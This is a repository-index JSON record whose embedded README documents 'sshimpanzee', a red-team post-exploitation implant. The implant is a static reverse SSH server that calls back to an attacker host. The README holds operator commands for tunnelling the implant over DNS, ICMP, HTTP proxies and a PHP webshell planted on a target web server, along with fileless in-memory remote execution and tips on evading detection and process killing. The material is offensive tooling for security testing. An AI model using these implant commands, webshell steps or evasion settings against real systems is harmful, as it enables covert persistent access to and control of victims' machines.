{"id":19866201,"url":"https://github.com/lexfo/sshimpanzee","last_synced_at":"2025-05-02T05:32:29.333Z","repository":{"id":153234993,"uuid":"622912124","full_name":"lexfo/sshimpanzee","owner":"lexfo","description":"SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS, ICMP, HTTP Encapsulation, HTTP/Socks Proxies, UDP...)","archived":false,"fork":false,"pushed_at":"2025-03-05T08:32:56.000Z","size":144,"stargazers_count":243,"open_issues_count":0,"forks_count":27,"subscribers_count":5,"default_branch":"main","last_synced_at":"2025-03-05T09:34:14.291Z","etag":null,"topics":["backdoor","post-exploitation","redteam","reverse-shell","tunneling"],"latest_commit_sha":null,"homepage":"https://blog.lexfo.fr/sshimpanzee.html","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lexfo.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-04-03T10:11:27.000Z","updated_at":"2025-03-05T08:32:59.000Z","dependencies_parsed_at":"2024-01-29T16:17:31.611Z","dependency_job_id":"2e19338a-9c91-4245-949d-645041a5ecf5","html_url":"https://github.com/lexfo/sshimpanzee","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lexfo%2Fsshimpanzee","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lexfo%2Fsshimpanzee/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lexfo%2Fsshimpanzee/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lexfo%2Fsshimpanzee/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lexfo","download_url":"https://codeload.github.com/lexfo/sshimpanzee/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251993002,"owners_count":21677022,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","post-exploitation","redteam","reverse-shell","tunneling"],"created_at":"2024-11-12T15:25:14.377Z","updated_at":"2025-05-02T05:32:24.321Z","avatar_url":"https://github.com/lexfo.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"# Sshimpanzee\n__Sshimpanzee__ allows you to build a __static *reverse* ssh server__.\nInstead of listening on a port and waiting for connections, the ssh server will initiate a reverse connect to attacker's ip, just like a regular reverse shell.\n__Sshimpanzee__ allows you to take advantage of __every features of a regular ssh__ connection, like __port forwards, dynamic socks proxies, or FTP server__.\n\nMore importantly, if a direct connection from the victim machine to the attacker server is not possible, it provides different tunnelling mecanisms such as __DNS Tunnelling, ICMP Tunnelling, or HTTP Encapsulation__.\nIt also supports HTTP and SOCKS5 proxies.\nA [technical paper](https://blog.lexfo.fr/sshimpanzee.html) is available on lexfo's blog.\n\n## DOCKER BUILD - RECOMMENDED\n\n```\nsudo docker build . --output . \nsudo docker build . --platform arm64 --output . \n```\n\n\u003e You might need to enable env var DOCKER_BUILDKIT=1 \n\n### Compilation file\n\nBuild is made based on the build.yaml file: \n\n```yaml\n\n###\n# This is sshimpanzee build configuration file\n# YAML is used to describe what behaviour and feature should the sshimpanzee get\n###\n\n### General config\n\nprocess_name: \"sshimpanzee\" # Name of the process as it appears in ps (yet you won't be able to kill it with this name)\n\n\nbanner: True # Should the banner be displayed at log\nverbose: 3 # Verbosity level as written in build/build.log\n\nshell: \"/bin/sh\" # Default shell to pop for user, bypassing /etc/passwd entries with false or nologin as shell\ntimer: 60*1000*1000  # Time in milliseconds before a new sshimpanzee child is forked after exiting. For example in sock MODE, a new sshd connection will be made 1 minute after the previous one is dead\n\nkeygen: True # Re generate keys during build, insure a new HOST and CLIENT keys is used\npublic_key: #if new keys are not regenerated it is possible to specify a public client key to authenticate (only ed25519 keys are supported)\n#public key: \"ssh-ed25519 .... ROGUE@ROGUE\"\n\nmake: True # Keep it to true if you want the builder script to generate sshd binary\nforce_clean_build: True #Currently required for docker builds, will force builder script to recompile tunnels and dependances\nreconf: True # Required for docker builds\n\n\n### Environment\n# sshimpanzee is configured at runtime through environment variables, yet, it is possible to preset environment variable, to get a default behavior\n\n\nenv:\n  if_not_set : # Variable here will be set if they do not already exists\n    REMOTE: 127.0.0.1\n    PORT: 8080\n    MODE: sock # MODE environment variable is used to manage the default tunnel\n  overwrite: # Variable here will overwrite already existent \n    \n\n### Tunnels\n# sshimpanzee come with different tunneling mecanisms\n# To speed up compilation time, and more importantly to get a lighter binary it is possible to include or exclude some tunnels\n# Tunnel compilation parameters can be specified here \ntun:\n  sock:\n      enabled: True\n\n  icmp:\n      enabled: True\n      buildserv: True # should the corresponding ICMPTunnel server be built \n      raw_sock: False # build with support for raw sock for older kernels\n\n  http_enc :\n      enabled: True\n      key: # web shell key, empty will result in a new key being generated\n      target:\n        - \"php\" # list of language you want to generate webshells for \n      path_fd: \"/dev/shm/sshim\" # Fifo that sshimpanzee will use to communicate with webshells\n\n  dns:\n      enabled: True    \n      resource: sshimpanzee # DNS2TCP Resource\n      key: sshimpanzee # DNS2TCP key\n      obfuscate: True # obfuscating DNS2TCP Magic string, this will force the build of the corresponding srver\n      buildserv: False \n      qtype: TXT # Type of query used by DNS2TCP\n\n  proxysock:\n      enabled: True\n\n  no_build:\n      enabled: False \n      path: []\n\n# Openssh subsystems\n# man sshd_config Subsystems\n\nsubsystems:\n\n  internal_sftp: # standard sftp as provided by openssh \n    enabled: True # It is required for scp and sftp\n    name: sftp\n    exec: internal-sftp\n    is_internal: True\n    \n  remote_exec: # Sshimpanzee custom subsystem\n    enabled: True # remote execution using fileless memfd technique\n    name: remote-exec\n    exec: internal-remote-exec\n    is_internal: True\n\n  python: # example of a stadard ssh subsystem\n    enabled: False\n    name: python\n    exec: /usr/bin/python -c \"print('python code')\"\n    is_internal: False\n```\n\n\n## Usage \n\nAt runtime, sshimpanzee binary is configured through environment variable.\nThe `MODE` variable allows user to select between compiled tunnels. \nEvery tunnels can be configured through environment variables. \nFor example, to get a classic reverse connect to 127.0.0.1:8080 use the following:\n```\nMODE=socks REMOTE=127.0.0.1 PORT=8080 ./sshimpanzee\n```\n\n\u003e It is possible to run sshimpanzee in debug mode with -d.\n\u003e In debug mode sshimpanzee will stay in foreground.\n\n### Tunnels \n\nCurrently sshimpanzee support several ways for the implant to reach out to the attacker ssh client:  \n- DNS Tunnelling using dns2tcp protocol   \n- Proxy :  HTTP/SOCKS4/SOCKS5   \n- Sockets : (might be usefull if you want to implement your own tunnels)   \n- ICMP tunnel   \n- HTTP Encapsulation\n\n### Sock Connection\n\n1) Run ssh on client side as follow:\n\n``` \nssh anyrandomname@127.0.0.1 -oProxyCommand=\"nc -lp 8080\" -i CLIENT\n```\n\n\n2) Run sshimpanzee on target :\n```\nMODE=sock REMOTE=127.0.0.1 PORT=8080 ./sshimpanzee \n```\n\nOther examples :\n```\nMODE=sock REMOTE=127.0.0.1 PORT=8080 SSHIM_LISTEN= ./sshimpanzee  # bind and listen to 127.0.0.1:8080\n\nMODE=sock UNIXPATH=/tmp/sock SSHIM_UNIX ./sshimpanzee # Connect to unix socket /tmp/sock\nMODE=sock UNIXPATH=/tmp/sock SSHIM_UNIX= SSHIM_LISTEN= ./sshimpanzee # Bind and listen to /tmp/sock unix socket \n```\n\n### Connection through proxy\n1) Run ssh on client side as follow:\n\n``` \nssh anyrandomname@127.0.0.1 -oProxyCommand=\"nc -lp 4444\" -i CLIENT\n```\n\n\n2) Run sshimpanzee on target :\n```\nMODE=proxysock REMOTE=attacker.server PORT=4444 http_proxy=socks5://proxy.lan:8080 ./sshimpanzee\n```\n\nOther examples:\n```\nMODE=proxysock REMOTE=attacker.server PORT=4444 http_proxy=http://proxy.lan:8080 ./sshimpanzee\nMODE=proxysock REMOTE=attacker.server PROXY_USER=user PROXY_PASS=password PORT=4444 http_proxy=http://proxy.lan:8080 ./sshimpanzee\n\n```\n\n\n\n### Use DNS Tunneling\n\n1) On your server run the standard __dns2tcpd__ using the config file in this repo, you will need to modify the domain (and resource port if you want).\n```\nlisten = 0.0.0.0\nport = 53\nuser = nobody\nkey = sshimpanzee\nchroot = /var/empty/dns2tcp/\ndomain = \u003cSERVER\u003e\nresources = sshimpanzee:127.0.0.1:8080\n```\n\n```\nsudo ./dns2tcpd -F -f dns2tcpdrc\n```\n\n2) Run ssh on client side as follow:\n\n``` \nssh anyrandomname@127.0.0.1 -oProxyCommand=\"nc -lp 8080\" -i CLIENT\n```\n\n3) Run the sshimpanzee binary:\n```\nMODE=dns REMOTE=attacker.controled.domain ./sshimpanzee\n```\n\nOther examples :\n```\nMODE=dns REMOTE=attacker.controled.domain RESOLVER=8.8.8.8 ./sshimpanzee # Force the use of 8.8.8.8 DNS Resolver\n```\n\n### Use ICMP Tunneling\n\n1) Your server, add the correct capabilities to avoid running the proxycommand as root and disable ping response from the system\n``` \nsudo setcap cap_net_raw+ep icmptunnel\necho 1 | sudo dd of=/proc/sys/net/ipv4/icmp_echo_ignore_all \n```\n\n2) Run the standard ssh client with icmptunnel as proxycommand:\n```\nssh i -oProxyCommand=./icmptunnel -i test/CLIENT \n```\n\n3) Run\tthe sshimpanzee\tbinary:\n```\nMODE=icmp REMOTE=127.0.0.1 ./sshimpanzee \n```\n\n\n### Use HTTP Encapsulation (ssh -\u003e http server -\u003e sshd)\n\n1) Upload the file /tuns/http_enc/proxy.php and sshd files to your target web server\n\n2) Make sure proxy.php is correctly executed \n\n3) Run sshd binary on the webserver\n```\nMODE=http_enc ./sshimpanzee \n```\n\n4) run ssh on client machine with python script in utils/scripts/ as proxy command :\n```\nssh -o ProxyCommand='python proxy_cli.py http://127.0.0.1:8080/proxy.php EncryptionKey 2\u003e/dev/null' a@a -i ../../keys/CLIENT \n```\n\u003e Multiple argument can be passed to  proxy_cli.py to add proxies proxies.\n\u003e Currently only PHP is supported. On a JSP server, it is recommended to use: [A Black Path Toward The Sun (ABPTTS)](https://github.com/nccgroup/ABPTTS)\n\n\n#### Side notes about http Encapsulation\n1) Proxy.php is a minimal webshell, you can use it to upload sshd to the server and run commands. proxy_cli.py offers --run and --drop options to do so.\n\n2) You might experience a huge input lag, it is because a delay of 1 to 5 second is added to the packet sent by ssh client to prevent from generating to many http request. If you don't mind generating a lot of http request (thus a lot of logs on the web server) add the --no-buffer option to proxy_cli.py command.\n\n## Using the sshimpanzee client\nThis repo also provide a client located in __utils/client/bin__.\nSimply copy the CLIENT key in utils/client/keys/\n```\nsshimpanzee --new PORT #create a new listener on PORT\nsshimpanzee --new-dns #create a new DNS listener (Don't forget to modify utils/client/config/dnsconf.txt)\nsshimpanzee --new-icmp #create a new icmp listener\nsshimpanzee --new-http PROXY_PHP_URL #create a new HTTP Session \n\nsshimpanzee --list #list availaible sessions\n\nsshimpanzee --get SESSION_NUMBER #to jump into a session any extra parameters are passed as ssh params\nsshimpanzee --rename SESSION_NUMBER #to rename a session\nsshimpanzee --kill SESSION_NUMBER #to kill a session\nsshimpanzee #use fzf to select which session you want\n```\n\nHowever it might be less reliable than using ssh directly.\n\n## Create your own tunnel mecanism\nEvery tunnels are available in the tuns/ directory. If you want to add another tunnel, simply add a function with the name of your tunnel in tuns/builder.py. This function is responsible to generate a libtun.a archive containing as many .o as necessary with one of them exporting a tun() symbole.\nAlternatively, you build the libtun.a yourself and use the tunnel called no_build, and provide the path to your custom libtun.a\n\n\n## Use the file less execution\nIf sshimpanzee is built with remote-exec subsystem module, it is possible to execute code remotely completely in memory.\n```sh\n\npython remote_loader.py \"ssh -vvvv t@t -S ./SOCKET -s remote-exec\" /home/titouan/tools/Misc/RustScan/target/release/rustscan -a 127.0.0.1\n```\n\n\n## Future Work\n- Add other tunnels :\n  - HTTP Encapsulation (First step through http_enc and proxy.php : add JSP and other programs ) \n  - Userland TCP/IP Stack with raw sock ?\n  - ICMP : Xor/Encrypt string to avoid detection in case of network analysis \n  - Subsystem for post exploitation: \n\t- Procdump \n\t- TCP Scan\n\t\n\n## Thanks\n\nThis repository relies on a lot of different project. \n- First of all, Openssh-portable (9.1) : https://github.com/openssh/openssh-portable\n- The musl libc to build it statically : https://wiki.musl-libc.org/\n\nFor the tunnels: \n- Dns2tcp : https://github.com/alex-sector/dns2tcp\n- icmptunnel (heavily modified to improve tunnel resiliency) : https://github.com/DhavalKapil/icmptunnel.git\n- Proxysocket : https://github.com/brechtsanders/proxysocket\n\n\nIt is important to note that it is *not* a very original project, weaponizing ssh protocol has already been done several years ago:\n- https://github.com/Marc-andreLabonte/blackbear \n- https://github.com/Fahrj/reverse-ssh\n- https://github.com/NHAS/reverse_ssh\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flexfo%2Fsshimpanzee","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Flexfo%2Fsshimpanzee","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flexfo%2Fsshimpanzee/lists"}